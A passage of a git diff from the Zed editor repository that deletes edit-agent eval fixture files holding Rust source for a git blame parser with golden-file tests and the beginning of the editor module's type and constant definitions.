val.eq_ignore_ascii_case("true")) - .unwrap_or(false); - - if update { - std::fs::create_dir_all(path.parent().unwrap()) - .expect("could not create golden test data directory"); - std::fs::write(&path, have_json).expect("could not write out golden data"); - } else { - let want_json = - std::fs::read_to_string(&path).unwrap_or_else(|_| { - panic!("could not read golden test data file at {:?}. Did you run the test with UPDATE_GOLDEN=true before?", path); - }).replace("\r\n", "\n"); - - pretty_assertions::assert_eq!(have_json, want_json, "wrong blame entries"); - } - } - - #[test] - fn test_parse_git_blame_not_committed() { - let output = read_test_data("blame_incremental_not_committed"); - let entries = parse_git_blame(&output).unwrap(); - assert_eq_golden(&entries, "blame_incremental_not_committed"); - } - - #[test] - fn test_parse_git_blame_simple() { - let output = read_test_data("blame_incremental_simple"); - let entries = parse_git_blame(&output).unwrap(); - assert_eq_golden(&entries, "blame_incremental_simple"); - } - - #[test] - fn test_parse_git_blame_complex() { - let output = read_test_data("blame_incremental_complex"); - let entries = parse_git_blame(&output).unwrap(); - assert_eq_golden(&entries, "blame_incremental_complex"); - } -} diff --git a/crates/agent/src/edit_agent/evals/fixtures/delete_run_git_blame/before.rs b/crates/agent/src/edit_agent/evals/fixtures/delete_run_git_blame/before.rs deleted file mode 100644 index 36fccb51327126..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/delete_run_git_blame/before.rs +++ /dev/null @@ -1,371 +0,0 @@ -use crate::commit::get_messages; -use crate::{GitRemote, Oid}; -use anyhow::{Context as _, Result, anyhow}; -use collections::{HashMap, HashSet}; -use futures::AsyncWriteExt; -use gpui::SharedString; -use serde::{Deserialize, Serialize}; -use std::process::Stdio; -use std::{ops::Range, path::Path}; -use text::Rope; -use time::OffsetDateTime; -use time::UtcOffset; -use time::macros::format_description; - -pub use git2 as libgit; - -#[derive(Debug, Clone, Default)] -pub struct Blame { - pub entries: Vec, - pub messages: HashMap, - pub remote_url: Option, -} - -#[derive(Clone, Debug, Default)] -pub struct ParsedCommitMessage { - pub message: SharedString, - pub permalink: Option, - pub pull_request: Option, - pub remote: Option, -} - -impl Blame { - pub async fn for_path( - git_binary: &Path, - working_directory: &Path, - path: &Path, - content: &Rope, - remote_url: Option, - ) -> Result { - let output = run_git_blame(git_binary, working_directory, path, content).await?; - let mut entries = parse_git_blame(&output)?; - entries.sort_unstable_by(|a, b| a.range.start.cmp(&b.range.start)); - - let mut unique_shas = HashSet::default(); - - for entry in entries.iter_mut() { - unique_shas.insert(entry.sha); - } - - let shas = unique_shas.into_iter().collect::>(); - let messages = get_messages(working_directory, &shas) - .await - .context("failed to get commit messages")?; - - Ok(Self { - entries, - messages, - remote_url, - }) - } -} - -const GIT_BLAME_NO_COMMIT_ERROR: &str = "fatal: no such ref: HEAD"; -const GIT_BLAME_NO_PATH: &str = "fatal: no such path"; - -async fn run_git_blame( - git_binary: &Path, - working_directory: &Path, - path: &Path, - contents: &Rope, -) -> Result { - let mut child = util::command::new_smol_command(git_binary) - .current_dir(working_directory) - .arg("blame") - .arg("--incremental") - .arg("--contents") - .arg("-") - .arg(path.as_os_str()) - .stdin(Stdio::piped()) - .stdout(Stdio::piped()) - .stderr(Stdio::piped()) - .spawn() - .context("starting git blame process")?; - - let stdin = child - .stdin - .as_mut() - .context("failed to get pipe to stdin of git blame command")?; - - for chunk in contents.chunks() { - stdin.write_all(chunk.as_bytes()).await?; - } - stdin.flush().await?; - - let output = child.output().await.context("reading git blame output")?; - - if !output.status.success() { - let stderr = String::from_utf8_lossy(&output.stderr); - let trimmed = stderr.trim(); - if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { - return Ok(String::new()); - } - anyhow::bail!("git blame process failed: {stderr}"); - } - - Ok(String::from_utf8(output.stdout)?) -} - -#[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] -pub struct BlameEntry { - pub sha: Oid, - - pub range: Range, - - pub original_line_number: u32, - - pub author: Option, - pub author_mail: Option, - pub author_time: Option, - pub author_tz: Option, - - pub committer_name: Option, - pub committer_email: Option, - pub committer_time: Option, - pub committer_tz: Option, - - pub summary: Option, - - pub previous: Option, - pub filename: String, -} - -impl BlameEntry { - // Returns a BlameEntry by parsing the first line of a `git blame --incremental` - // entry. The line MUST have this format: - // - // <40-byte-hex-sha1> - fn new_from_blame_line(line: &str) -> Result { - let mut parts = line.split_whitespace(); - - let sha = parts - .next() - .and_then(|line| line.parse::().ok()) - .with_context(|| format!("parsing sha from {line}"))?; - - let original_line_number = parts - .next() - .and_then(|line| line.parse::().ok()) - .with_context(|| format!("parsing original line number from {line}"))?; - let final_line_number = parts - .next() - .and_then(|line| line.parse::().ok()) - .with_context(|| format!("parsing final line number from {line}"))?; - - let line_count = parts - .next() - .and_then(|line| line.parse::().ok()) - .with_context(|| format!("parsing line count from {line}"))?; - - let start_line = final_line_number.saturating_sub(1); - let end_line = start_line + line_count; - let range = start_line..end_line; - - Ok(Self { - sha, - range, - original_line_number, - ..Default::default() - }) - } - - pub fn author_offset_date_time(&self) -> Result { - if let (Some(author_time), Some(author_tz)) = (self.author_time, &self.author_tz) { - let format = format_description!("[offset_hour][offset_minute]"); - let offset = UtcOffset::parse(author_tz, &format)?; - let date_time_utc = OffsetDateTime::from_unix_timestamp(author_time)?; - - Ok(date_time_utc.to_offset(offset)) - } else { - // Directly return current time in UTC if there's no committer time or timezone - Ok(time::OffsetDateTime::now_utc()) - } - } -} - -// parse_git_blame parses the output of `git blame --incremental`, which returns -// all the blame-entries for a given path incrementally, as it finds them. -// -// Each entry *always* starts with: -// -// <40-byte-hex-sha1> -// -// Each entry *always* ends with: -// -// filename -// -// Line numbers are 1-indexed. -// -// A `git blame --incremental` entry looks like this: -// -// 6ad46b5257ba16d12c5ca9f0d4900320959df7f4 2 2 1 -// author Joe Schmoe -// author-mail -// author-time 1709741400 -// author-tz +0100 -// committer Joe Schmoe -// committer-mail -// committer-time 1709741400 -// committer-tz +0100 -// summary Joe's cool commit -// previous 486c2409237a2c627230589e567024a96751d475 index.js -// filename index.js -// -// If the entry has the same SHA as an entry that was already printed then no -// signature information is printed: -// -// 6ad46b5257ba16d12c5ca9f0d4900320959df7f4 3 4 1 -// previous 486c2409237a2c627230589e567024a96751d475 index.js -// filename index.js -// -// More about `--incremental` output: https://mirrors.edge.kernel.org/pub/software/scm/git/docs/git-blame.html -fn parse_git_blame(output: &str) -> Result> { - let mut entries: Vec = Vec::new(); - let mut index: HashMap = HashMap::default(); - - let mut current_entry: Option = None; - - for line in output.lines() { - let mut done = false; - - match &mut current_entry { - None => { - let mut new_entry = BlameEntry::new_from_blame_line(line)?; - - if let Some(existing_entry) = index - .get(&new_entry.sha) - .and_then(|slot| entries.get(*slot)) - { - new_entry.author.clone_from(&existing_entry.author); - new_entry - .author_mail - .clone_from(&existing_entry.author_mail); - new_entry.author_time = existing_entry.author_time; - new_entry.author_tz.clone_from(&existing_entry.author_tz); - new_entry - .committer_name - .clone_from(&existing_entry.committer_name); - new_entry - .committer_email - .clone_from(&existing_entry.committer_email); - new_entry.committer_time = existing_entry.committer_time; - new_entry - .committer_tz - .clone_from(&existing_entry.committer_tz); - new_entry.summary.clone_from(&existing_entry.summary); - } - - current_entry.replace(new_entry); - } - Some(entry) => { - let Some((key, value)) = line.split_once(' ') else { - continue; - }; - let is_committed = !entry.sha.is_zero(); - match key { - "filename" => { - entry.filename = value.into(); - done = true; - } - "previous" => entry.previous = Some(value.into()), - - "summary" if is_committed => entry.summary = Some(value.into()), - "author" if is_committed => entry.author = Some(value.into()), - "author-mail" if is_committed => entry.author_mail = Some(value.into()), - "author-time" if is_committed => { - entry.author_time = Some(value.parse::()?) - } - "author-tz" if is_committed => entry.author_tz = Some(value.into()), - - "committer" if is_committed => entry.committer_name = Some(value.into()), - "committer-mail" if is_committed => entry.committer_email = Some(value.into()), - "committer-time" if is_committed => { - entry.committer_time = Some(value.parse::()?) - } - "committer-tz" if is_committed => entry.committer_tz = Some(value.into()), - _ => {} - } - } - }; - - if done { - if let Some(entry) = current_entry.take() { - index.insert(entry.sha, entries.len()); - - // We only want annotations that have a commit. - if !entry.sha.is_zero() { - entries.push(entry); - } - } - } - } - - Ok(entries) -} - -#[cfg(test)] -mod tests { - use std::path::PathBuf; - - use super::BlameEntry; - use super::parse_git_blame; - - fn read_test_data(filename: &str) -> String { - let mut path = PathBuf::from(env!("CARGO_MANIFEST_DIR")); - path.push("test_data"); - path.push(filename); - - std::fs::read_to_string(&path) - .unwrap_or_else(|_| panic!("Could not read test data at {:?}. Is it generated?", path)) - } - - fn assert_eq_golden(entries: &Vec, golden_filename: &str) { - let mut path = PathBuf::from(env!("CARGO_MANIFEST_DIR")); - path.push("test_data"); - path.push("golden"); - path.push(format!("{}.json", golden_filename)); - - let mut have_json = - serde_json::to_string_pretty(&entries).expect("could not serialize entries to JSON"); - // We always want to save with a trailing newline. - have_json.push('\n'); - - let update = std::env::var("UPDATE_GOLDEN") - .map(|val| val.eq_ignore_ascii_case("true")) - .unwrap_or(false); - - if update { - std::fs::create_dir_all(path.parent().unwrap()) - .expect("could not create golden test data directory"); - std::fs::write(&path, have_json).expect("could not write out golden data"); - } else { - let want_json = - std::fs::read_to_string(&path).unwrap_or_else(|_| { - panic!("could not read golden test data file at {:?}. Did you run the test with UPDATE_GOLDEN=true before?", path); - }).replace("\r\n", "\n"); - - pretty_assertions::assert_eq!(have_json, want_json, "wrong blame entries"); - } - } - - #[test] - fn test_parse_git_blame_not_committed() { - let output = read_test_data("blame_incremental_not_committed"); - let entries = parse_git_blame(&output).unwrap(); - assert_eq_golden(&entries, "blame_incremental_not_committed"); - } - - #[test] - fn test_parse_git_blame_simple() { - let output = read_test_data("blame_incremental_simple"); - let entries = parse_git_blame(&output).unwrap(); - assert_eq_golden(&entries, "blame_incremental_simple"); - } - - #[test] - fn test_parse_git_blame_complex() { - let output = read_test_data("blame_incremental_complex"); - let entries = parse_git_blame(&output).unwrap(); - assert_eq_golden(&entries, "blame_incremental_complex"); - } -} diff --git a/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/before.rs b/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/before.rs deleted file mode 100644 index 198ab45b13faef..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/before.rs +++ /dev/null @@ -1,21344 +0,0 @@ -#![allow(rustdoc::private_intra_doc_links)] -//! This is the place where everything editor-related is stored (data-wise) and displayed (ui-wise). -//! The main point of interest in this crate is [`Editor`] type, which is used in every other Zed part as a user input element. -//! It comes in different flavors: single line, multiline and a fixed height one. -//! -//! Editor contains of multiple large submodules: -//! * [`element`] — the place where all rendering happens -//! * [`display_map`] - chunks up text in the editor into the logical blocks, establishes coordinates and mapping between each of them. -//! Contains all metadata related to text transformations (folds, fake inlay text insertions, soft wraps, tab markup, etc.). -//! * [`inlay_hint_cache`] - is a storage of inlay hints out of LSP requests, responsible for querying LSP and updating `display_map`'s state accordingly. -//! -//! All other submodules and structs are mostly concerned with holding editor data about the way it displays current buffer region(s). -//! -//! If you're looking to improve Vim mode, you should check out Vim crate that wraps Editor and overrides its behavior. -pub mod actions; -mod blink_manager; -mod clangd_ext; -mod code_context_menus; -pub mod display_map; -mod editor_settings; -mod editor_settings_controls; -mod element; -mod git; -mod highlight_matching_bracket; -mod hover_links; -pub mod hover_popover; -mod indent_guides; -mod inlay_hint_cache; -pub mod items; -mod jsx_tag_auto_close; -mod linked_editing_ranges; -mod lsp_ext; -mod mouse_context_menu; -pub mod movement; -mod persistence; -mod proposed_changes_editor; -mod rust_analyzer_ext; -pub mod scroll; -mod selections_collection; -pub mod tasks; - -#[cfg(test)] -mod code_completion_tests; -#[cfg(test)] -mod editor_tests; -#[cfg(test)] -mod inline_completion_tests; -mod signature_help; -#[cfg(any(test, feature = "test-support"))] -pub mod test; - -pub(crate) use actions::*; -pub use actions::{AcceptEditPrediction, OpenExcerpts, OpenExcerptsSplit}; -use aho_corasick::AhoCorasick; -use anyhow::{Context as _, Result, anyhow}; -use blink_manager::BlinkManager; -use buffer_diff::DiffHunkStatus; -use client::{Collaborator, ParticipantIndex}; -use clock::ReplicaId; -use collections::{BTreeMap, HashMap, HashSet, VecDeque}; -use convert_case::{Case, Casing}; -use display_map::*; -pub use display_map::{ChunkRenderer, ChunkRendererContext, DisplayPoint, FoldPlaceholder}; -use editor_settings::GoToDefinitionFallback; -pub use editor_settings::{ - CurrentLineHighlight, EditorSettings, HideMouseMode, ScrollBeyondLastLine, SearchSettings, - ShowScrollbar, -}; -pub use editor_settings_controls::*; -use element::{AcceptEditPredictionBinding, LineWithInvisibles, PositionMap, layout_line}; -pub use element::{ - CursorLayout, EditorElement, HighlightedRange, HighlightedRangeLine, PointForPosition, -}; -use feature_flags::{DebuggerFeatureFlag, FeatureFlagAppExt}; -use futures::{ - FutureExt, - future::{self, Shared, join}, -}; -use fuzzy::StringMatchCandidate; - -use ::git::blame::BlameEntry; -use ::git::{Restore, blame::ParsedCommitMessage}; -use code_context_menus::{ - AvailableCodeAction, CodeActionContents, CodeActionsItem, CodeActionsMenu, CodeContextMenu, - CompletionsMenu, ContextMenuOrigin, -}; -use git::blame::{GitBlame, GlobalBlameRenderer}; -use gpui::{ - Action, Animation, AnimationExt, AnyElement, App, AppContext, AsyncWindowContext, - AvailableSpace, Background, Bounds, ClickEvent, ClipboardEntry, ClipboardItem, Context, - DispatchPhase, Edges, Entity, EntityInputHandler, EventEmitter, FocusHandle, FocusOutEvent, - Focusable, FontId, FontWeight, Global, HighlightStyle, Hsla, KeyContext, Modifiers, - MouseButton, MouseDownEvent, PaintQuad, ParentElement, Pixels, Render, ScrollHandle, - SharedString, Size, Stateful, Styled, Subscription, Task, TextStyle, TextStyleRefinement, - UTF16Selection, UnderlineStyle, UniformListScrollHandle, WeakEntity, WeakFocusHandle, Window, - div, impl_actions, point, prelude::*, pulsating_between, px, relative, size, -}; -use highlight_matching_bracket::refresh_matching_bracket_highlights; -use hover_links::{HoverLink, HoveredLinkState, InlayHighlight, find_file}; -pub use hover_popover::hover_markdown_style; -use hover_popover::{HoverState, hide_hover}; -use indent_guides::ActiveIndentGuidesState; -use inlay_hint_cache::{InlayHintCache, InlaySplice, InvalidationStrategy}; -pub use inline_completion::Direction; -use inline_completion::{EditPredictionProvider, InlineCompletionProviderHandle}; -pub use items::MAX_TAB_TITLE_LEN; -use itertools::Itertools; -use language::{ - AutoindentMode, BracketMatch, BracketPair, Buffer, Capability, CharKind, CodeLabel, - CursorShape, DiagnosticEntry, DiffOptions, EditPredictionsMode, EditPreview, HighlightedText, - IndentKind, IndentSize, Language, OffsetRangeExt, Point, Selection, SelectionGoal, TextObject, - TransactionId, TreeSitterOptions, WordsQuery, - language_settings::{ - self, InlayHintSettings, LspInsertMode, RewrapBehavior, WordsCompletionMode, - all_language_settings, language_settings, - }, - point_from_lsp, text_diff_with_options, -}; -use language::{BufferRow, CharClassifier, Runnable, RunnableRange, point_to_lsp}; -use linked_editing_ranges::refresh_linked_ranges; -use markdown::Markdown; -use mouse_context_menu::MouseContextMenu; -use persistence::DB; -use project::{ - ProjectPath, - debugger::{ - breakpoint_store::{ - BreakpointEditAction, BreakpointState, BreakpointStore, BreakpointStoreEvent, - }, - session::{Session, SessionEvent}, - }, -}; - -pub use git::blame::BlameRenderer; -pub use proposed_changes_editor::{ - ProposedChangeLocation, ProposedChangesEditor, ProposedChangesEditorToolbar, -}; -use smallvec::smallvec; -use std::{cell::OnceCell, iter::Peekable}; -use task::{ResolvedTask, RunnableTag, TaskTemplate, TaskVariables}; - -pub use lsp::CompletionContext; -use lsp::{ - CodeActionKind, CompletionItemKind, CompletionTriggerKind, DiagnosticSeverity, - InsertTextFormat, InsertTextMode, LanguageServerId, LanguageServerName, -}; - -use language::BufferSnapshot; -pub use lsp_ext::lsp_tasks; -use movement::TextLayoutDetails; -pub use multi_buffer::{ - Anchor, AnchorRangeExt, ExcerptId, ExcerptRange, MultiBuffer, MultiBufferSnapshot, PathKey, - RowInfo, ToOffset, ToPoint, -}; -use multi_buffer::{ - ExcerptInfo, ExpandExcerptDirection, MultiBufferDiffHunk, MultiBufferPoint, MultiBufferRow, - MultiOrSingleBufferOffsetRange, ToOffsetUtf16, -}; -use parking_lot::Mutex; -use project::{ - CodeAction, Completion, CompletionIntent, CompletionSource, DocumentHighlight, InlayHint, - Location, LocationLink, PrepareRenameResponse, Project, ProjectItem, ProjectTransaction, - TaskSourceKind, - debugger::breakpoint_store::Breakpoint, - lsp_store::{CompletionDocumentation, FormatTrigger, LspFormatTarget, OpenLspBufferHandle}, - project_settings::{GitGutterSetting, ProjectSettings}, -}; -use rand::prelude::*; -use rpc::{ErrorExt, proto::*}; -use scroll::{Autoscroll, OngoingScroll, ScrollAnchor, ScrollManager, ScrollbarAutoHide}; -use selections_collection::{ - MutableSelectionsCollection, SelectionsCollection, resolve_selections, -}; -use serde::{Deserialize, Serialize}; -use settings::{Settings, SettingsLocation, SettingsStore, update_settings_file}; -use smallvec::SmallVec; -use snippet::Snippet; -use std::sync::Arc; -use std::{ - any::TypeId, - borrow::Cow, - cell::RefCell, - cmp::{self, Ordering, Reverse}, - mem, - num::NonZeroU32, - ops::{ControlFlow, Deref, DerefMut, Not as _, Range, RangeInclusive}, - path::{Path, PathBuf}, - rc::Rc, - time::{Duration, Instant}, -}; -pub use sum_tree::Bias; -use sum_tree::TreeMap; -use text::{BufferId, FromAnchor, OffsetUtf16, Rope}; -use theme::{ - ActiveTheme, PlayerColor, StatusColors, SyntaxTheme, ThemeColors, ThemeSettings, - observe_buffer_font_size_adjustment, -}; -use ui::{ - ButtonSize, ButtonStyle, ContextMenu, Disclosure, IconButton, IconButtonShape, IconName, - IconSize, Key, Tooltip, h_flex, prelude::*, -}; -use util::{RangeExt, ResultExt, TryFutureExt, maybe, post_inc}; -use workspace::{ - Item as WorkspaceItem, ItemId, ItemNavHistory, OpenInTerminal, OpenTerminal, - RestoreOnStartupBehavior, SERIALIZATION_THROTTLE_TIME, SplitDirection, TabBarSettings, Toast, - ViewId, Workspace, WorkspaceId, WorkspaceSettings, - item::{ItemHandle, PreviewTabsSettings}, - notifications::{DetachAndPromptErr, NotificationId, NotifyTaskExt}, - searchable::SearchEvent, -}; - -use crate::hover_links::{find_url, find_url_from_range}; -use crate::signature_help::{SignatureHelpHiddenBy, SignatureHelpState}; - -pub const FILE_HEADER_HEIGHT: u32 = 2; -pub const MULTI_BUFFER_EXCERPT_HEADER_HEIGHT: u32 = 1; -pub const DEFAULT_MULTIBUFFER_CONTEXT: u32 = 2; -const CURSOR_BLINK_INTERVAL: Duration = Duration::from_millis(500); -const MAX_LINE_LEN: usize = 1024; -const MIN_NAVIGATION_HISTORY_ROW_DELTA: i64 = 10; -const MAX_SELECTION_HISTORY_LEN: usize = 1024; -pub(crate) const CURSORS_VISIBLE_FOR: Duration = Duration::from_millis(2000); -#[doc(hidden)] -pub const CODE_ACTIONS_DEBOUNCE_TIMEOUT: Duration = Duration::from_millis(250); -const SELECTION_HIGHLIGHT_DEBOUNCE_TIMEOUT: Duration = Duration::from_millis(100); - -pub(crate) const CODE_ACTION_TIMEOUT: Duration = Duration::from_secs(5); -pub(crate) const FORMAT_TIMEOUT: Duration = Duration::from_secs(5); -pub(crate) const SCROLL_CENTER_TOP_BOTTOM_DEBOUNCE_TIMEOUT: Duration = Duration::from_secs(1); - -pub(crate) const EDIT_PREDICTION_KEY_CONTEXT: &str = "edit_prediction"; -pub(crate) const EDIT_PREDICTION_CONFLICT_KEY_CONTEXT: &str = "edit_prediction_conflict"; -pub(crate) const MIN_LINE_NUMBER_DIGITS: u32 = 4; - -pub type RenderDiffHunkControlsFn = Arc< - dyn Fn( - u32, - &DiffHunkStatus, - Range, - bool, - Pixels, - &Entity, - &mut Window, - &mut App, - ) -> AnyElement, ->; - -const COLUMNAR_SELECTION_MODIFIERS: Modifiers = Modifiers { - alt: true, - shift: true, - control: false, - platform: false, - function: false, -}; - -struct InlineValueCache { - enabled: bool, - inlays: Vec, - refresh_task: Task>, -} - -impl InlineValueCache { - fn new(enabled: bool) -> Self { - Self { - enabled, - inlays: Vec::new(), - refresh_task: Task::ready(None), - } - } -} - -#[derive(Clone, Copy, Debug, PartialEq, Eq, PartialOrd, Ord, Hash)] -pub enum InlayId { - InlineCompletion(usize), - Hint(usize), - DebuggerValue(usize), -} - -impl InlayId { - fn id(&self) -> usize { - match self { - Self::InlineCompletion(id) => *id, - Self::Hint(id) => *id, - Self::DebuggerValue(id) => *id, - } - } -} - -pub enum ActiveDebugLine {} -enum DocumentHighlightRead {} -enum DocumentHighlightWrite {} -enum InputComposition {} -enum SelectedTextHighlight {} - -pub enum ConflictsOuter {} -pub enum ConflictsOurs {} -pub enum ConflictsTheirs {} -pub enum ConflictsOursMarker {} -pub enum ConflictsTheirsMarker {} - -#[derive(Debug, Copy, Clone, PartialEq, Eq)] -pub enum Navigated { - Yes, - No, -} - -impl Navigated { - pub fn from_bool(yes: bool) -> Navigated { - if yes { Navigated::Yes } else { Navigated::No } - } -} - -#[derive(Debug, Clone, PartialEq, Eq)] -enum DisplayDiffHunk { - Folded { - display_row: DisplayRow, - }, - Unfolded { - is_created_file: bool, - diff_base_byte_range: Range, - display_row_range: Range, - multi_buffer_range: Range, - status: DiffHunkStatus, - }, -} - -pub enum HideMouseCursorOrigin { - TypingAction, - MovementAction, -} - -pub fn init_settings(cx: &mut App) { - EditorSettings::register(cx); -} - -pub fn init(cx: &mut App) { - init_settings(cx); - - cx.set_global(GlobalBlameRenderer(Arc::new(()))); - - workspace::register_project_item::(cx); - workspace::FollowableViewRegistry::register::(cx); - workspace::register_serializable_item::(cx); - - cx.observe_new( - |workspace: &mut Workspace, _: Option<&mut Window>, _cx: &mut Context| { - workspace.register_action(Editor::new_file); - workspace.register_action(Editor::new_file_vertical); - workspace.register_action(Editor::new_file_horizontal); - workspace.register_action(Editor::cancel_language_server_work); - }, - ) - .detach(); - - cx.on_action(move |_: &workspace::NewFile, cx| { - let app_state = workspace::AppState::global(cx); - if let Some(app_state) = app_state.upgrade() { - workspace::open_new( - Default::default(), - app_state, - cx, - |workspace, window, cx| { - Editor::new_file(workspace, &Default::default(), window, cx) - }, - ) - .detach(); - } - }); - cx.on_action(move |_: &workspace::NewWindow, cx| { - let app_state = workspace::AppState::global(cx); - if let Some(app_state) = app_state.upgrade() { - workspace::open_new( - Default::default(), - app_state, - cx, - |workspace, window, cx| { - cx.activate(true); - Editor::new_file(workspace, &Default::default(), window, cx) - }, - ) - .detach(); - } - }); -} - -pub fn set_blame_renderer(renderer: impl BlameRenderer + 'static, cx: &mut App) { - cx.set_global(GlobalBlameRenderer(Arc::new(renderer))); -} - -pub trait DiagnosticRenderer { - fn render_group( - &self, - diagnostic_group: Vec>, - buffer_id: BufferId, - snapshot: EditorSnapshot, - editor: WeakEntity, - cx: &mut App, - ) -> Vec>; - - fn render_hover( - &self, - diagnostic_group: Vec>, - range: Range, - buffer_id: BufferId, - cx: &mut App, - ) -> Option>; - - fn open_link( - &self, - editor: &mut Editor, - link: SharedString, - window: &mut Window, - cx: &mut Context, - ); -} - -pub(crate) struct GlobalDiagnosticRenderer(pub Arc); - -impl GlobalDiagnosticRenderer { - fn global(cx: &App) -> Option> { - cx.try_global::().map(|g| g.0.clone()) - } -} - -impl gpui::Global for GlobalDiagnosticRenderer {} -pub fn set_diagnostic_renderer(renderer: impl DiagnosticRenderer + 'static, cx: &mut App) { - cx.set_global(GlobalDiagnosticRenderer(Arc::new(renderer))); -} - -pub struct SearchWithinRange; - -trait InvalidationRegion { - fn ranges(&self) -> &[Range]; -} - -#[derive(Clone, Debug, PartialEq)] -pub enum SelectPhase { - Begin { - position: DisplayPoint, - add: bool, - click_count: usize, - }, - BeginColumnar { - position: DisplayPoint, - reset: bool, - goal_column: u32, - }, - Extend { - position: DisplayPoint, - click_count: usize, - }, - Update { - position: DisplayPoint, - goal_column: u32, - scroll_delta: gpui::Point, - }, - End, -} - -#[derive(Clone, Debug)] -pub enum SelectMode { - Character, - Word(Range), - Line(Range), - All, -} - -#[derive(Copy, Clone, PartialEq, Eq, Debug)] -pub enum EditorMode { - SingleLine { - auto_width: bool, - }, - AutoHeight { - max_lines: usize, - }, - Full { - /// When set to `true`, the editor will scale its UI elements with the buffer font size. - scale_ui_elements_with_buffer_font_size: bool, - /// When set to `true`, the editor will render a background for the active line. - show_active_line_background: bool, - /// When set to `true`, the editor's height will be determined by its content. - sized_by_content: bool, - }, -} - -impl EditorMode { - pub fn full() -> Self { - Self::Full { - scale_ui_elements_with_buffer_font_size: true, - show_active_line_background: true, - sized_by_content: false, - } - } - - pub fn is_full(&self) -> bool { - matches!(self, Self::Full { .. }) - } -} - -#[derive(Copy, Clone, Debug)] -pub enum SoftWrap { - /// Prefer not to wrap at all. - /// - /// Note: this is currently internal, as actually limited by [`crate::MAX_LINE_LEN`] until it wraps. - /// The mode is used inside git diff hunks, where it's seems currently more useful to not wrap as much as possible. - GitDiff, - /// Prefer a single line generally, unless an overly long line is encountered. - None, - /// Soft wrap lines that exceed the editor width. - EditorWidth, - /// Soft wrap lines at the preferred line length. - Column(u32), - /// Soft wrap line at the preferred line length or the editor width (whichever is smaller). - Bounded(u32), -} - -#[derive(Clone)] -pub struct EditorStyle { - pub background: Hsla, - pub local_player: PlayerColor, - pub text: TextStyle, - pub scrollbar_width: Pixels, - pub syntax: Arc, - pub status: StatusColors, - pub inlay_hints_style: HighlightStyle, - pub inline_completion_styles: InlineCompletionStyles, - pub unnecessary_code_fade: f32, -} - -impl Default for EditorStyle { - fn default() -> Self { - Self { - background: Hsla::default(), - local_player: PlayerColor::default(), - text: TextStyle::default(), - scrollbar_width: Pixels::default(), - syntax: Default::default(), - // HACK: Status colors don't have a real default. - // We should look into removing the status colors from the editor - // style and retrieve them directly from the theme. - status: StatusColors::dark(), - inlay_hints_style: HighlightStyle::default(), - inline_completion_styles: InlineCompletionStyles { - insertion: HighlightStyle::default(), - whitespace: HighlightStyle::default(), - }, - unnecessary_code_fade: Default::default(), - } - } -} - -pub fn make_inlay_hints_style(cx: &mut App) -> HighlightStyle { - let show_background = language_settings::language_settings(cx).get() - .inlay_hints - .show_background; - - HighlightStyle { - color: Some(cx.theme().status().hint), - background_color: show_background.then(|| cx.theme().status().hint_background), - ..HighlightStyle::default() - } -} - -pub fn make_suggestion_styles(cx: &mut App) -> InlineCompletionStyles { - InlineCompletionStyles { - insertion: HighlightStyle { - color: Some(cx.theme().status().predictive), - ..HighlightStyle::default() - }, - whitespace: HighlightStyle { - background_color: Some(cx.theme().status().created_background), - ..HighlightStyle::default() - }, - } -} - -type CompletionId = usize; - -pub(crate) enum EditDisplayMode { - TabAccept, - DiffPopover, - Inline, -} - -enum InlineCompletion { - Edit { - edits: Vec<(Range, String)>, - edit_preview: Option, - display_mode: EditDisplayMode, - snapshot: BufferSnapshot, - }, - Move { - target: Anchor, - snapshot: BufferSnapshot, - }, -} - -struct InlineCompletionState { - inlay_ids: Vec, - completion: InlineCompletion, - completion_id: Option, - invalidation_range: Range, -} - -enum EditPredictionSettings { - Disabled, - Enabled { - show_in_menu: bool, - preview_requires_modifier: bool, - }, -} - -enum InlineCompletionHighlight {} - -#[derive(Debug, Clone)] -struct InlineDiagnostic { - message: SharedString, - group_id: usize, - is_primary: bool, - start: Point, - severity: DiagnosticSeverity, -} - -pub enum MenuInlineCompletionsPolicy { - Never, - ByProvider, -} - -pub enum EditPredictionPreview { - /// Modifier is not pressed - Inactive { released_too_fast: bool }, - /// Modifier pressed - Active { - since: Instant, - previous_scroll_position: Option, - }, -} - -impl EditPredictionPreview { - pub fn released_too_fast(&self) -> bool { - match self { - EditPredictionPreview::Inactive { released_too_fast } => *released_too_fast, - EditPredictionPreview::Active { .. } => false, - } - } - - pub fn set_previous_scroll_position(&mut self, scroll_position: Option) { - if let EditPredictionPreview::Active { - previous_scroll_position, - .. - } = self - { - *previous_scroll_position = scroll_position; - } - } -} - -pub struct ContextMenuOptions { - pub min_entries_visible: usize, - pub max_entries_visible: usize, - pub placement: Option, -} - -#[derive(Debug, Clone, PartialEq, Eq)] -pub enum ContextMenuPlacement { - Above, - Below, -} - -#[derive(Copy, Clone, Eq, PartialEq, PartialOrd, Ord, Debug, Default)] -struct EditorActionId(usize); - -impl EditorActionId { - pub fn post_inc(&mut self) -> Self { - let answer = self.0; - - *self = Self(answer + 1); - - Self(answer) - } -} - -// type GetFieldEditorTheme = dyn Fn(&theme::Theme) -> theme::FieldEditor; -// type OverrideTextStyle = dyn Fn(&EditorStyle) -> Option; - -type BackgroundHighlight = (fn(&ThemeColors) -> Hsla, Arc<[Range]>); -type GutterHighlight = (fn(&App) -> Hsla, Arc<[Range]>); - -#[derive(Default)] -struct ScrollbarMarkerState { - scrollbar_size: Size, - dirty: bool, - markers: Arc<[PaintQuad]>, - pending_refresh: Option>>, -} - -impl ScrollbarMarkerState { - fn should_refresh(&self, scrollbar_size: Size) -> bool { - self.pending_refresh.is_none() && (self.scrollbar_size != scrollbar_size || self.dirty) - } -} - -#[derive(Clone, Debug)] -struct RunnableTasks { - templates: Vec<(TaskSourceKind, TaskTemplate)>, - offset: multi_buffer::Anchor, - // We need the column at which the task context evaluation should take place (when we're spawning it via gutter). - column: u32, - // Values of all named captures, including those starting with '_' - extra_variables: HashMap, - // Full range of the tagged region. We use it to determine which `extra_variables` to grab for context resolution in e.g. a modal. - context_range: Range, -} - -impl RunnableTasks { - fn resolve<'a>( - &'a self, - cx: &'a task::TaskContext, - ) -> impl Iterator + 'a { - self.templates.iter().filter_map(|(kind, template)| { - template - .resolve_task(&kind.to_id_base(), cx) - .map(|task| 